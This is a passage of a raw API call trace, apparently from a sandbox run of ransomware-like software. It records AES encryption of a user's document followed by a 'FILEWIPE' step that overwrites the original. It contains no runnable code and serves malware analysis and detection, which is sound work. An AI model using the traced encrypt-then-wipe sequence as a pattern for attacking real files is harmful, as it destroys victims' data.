wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0177.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0177.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0177.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0177.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0177.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0177.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0177.733] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0177.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0177.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0177.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0177.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0177.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0177.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0177.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0177.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0177.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0177.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0177.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0177.733] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0177.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0177.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0177.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0177.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0177.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0177.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0177.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0177.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0177.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0177.734] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0177.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0177.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0177.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0177.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0177.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0177.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0177.734] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.734] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0177.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0177.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0177.734] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0177.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0177.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0177.734] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0177.735] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2748, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2748*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0177.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0177.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0177.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0177.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0177.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0177.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0177.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0177.735] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0177.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0177.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0177.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0177.735] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0177.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0177.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0177.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0177.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0177.735] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4a0 [0177.735] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.735] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0177.735] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.735] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0177.735] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.736] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.736] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x15e3b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x15e40) returned 1 [0177.736] CharLowerBuffW (in: lpsz="byte[89665]", cchLength=0xb | out: lpsz="byte[89665]") returned 0xb [0177.738] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.740] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.740] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa8ac98*, pdwDataLen=0x87e820*=0x15e3b, dwBufLen=0x15e40 | out: pbData=0xa8ac98*, pdwDataLen=0x87e820*=0x15e40) returned 1 [0177.743] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0177.744] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0177.744] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.759] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0177.759] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.759] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.759] CryptDestroyKey (hKey=0x90af98) returned 1 [0177.759] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0177.759] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0177.759] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.759] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0177.759] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0177.759] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.759] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.760] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0177.760] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.760] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0177.760] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.760] FreeLibrary (hLibModule=0x74f20000) returned 1 [0177.765] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0177.765] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd471860, ftCreationTime.dwHighDateTime=0x1d5e4c0, ftLastAccessTime.dwLowDateTime=0xe53b1530, ftLastAccessTime.dwHighDateTime=0x1d5e177, ftLastWriteTime.dwLowDateTime=0xe53b1530, ftLastWriteTime.dwHighDateTime=0x1d5e177, nFileSizeHigh=0x0, nFileSizeLow=0x15e3b, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="f2lgxu.rtf", cAlternateFileName="")) returned 0x90ae18 [0177.765] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0177.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0177.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0177.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0177.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0177.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0177.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0177.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0177.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0177.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0177.766] CharLowerBuffW (in: lpsz="byte[89659]", cchLength=0xb | out: lpsz="byte[89659]") returned 0xb [0177.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0177.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0177.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0177.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0177.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0177.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0177.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0177.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0177.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0177.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0177.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0177.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0177.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0177.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0177.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.768] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0177.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0177.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0177.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0177.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0177.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0177.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0177.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0177.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0177.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0177.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0177.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0177.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0177.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0177.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0177.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0177.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0177.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0177.769] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0177.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0177.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0177.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0177.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0177.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0177.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0177.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0177.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0177.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0177.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0177.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0177.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0177.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.770] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0177.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0177.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2658, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0177.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.770] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0177.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0177.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0177.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0177.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0177.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0177.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0177.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0177.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0177.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0177.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0177.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0177.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0177.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0177.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0177.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0177.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0177.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0177.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0177.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0177.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0177.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0177.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0177.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0177.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0177.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0177.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0177.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0177.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0177.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0177.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0177.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0177.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0177.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0177.772] FreeLibrary (hLibModule=0x75c90000) returned 1 [0177.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0177.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0177.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0177.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0177.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0177.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0177.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 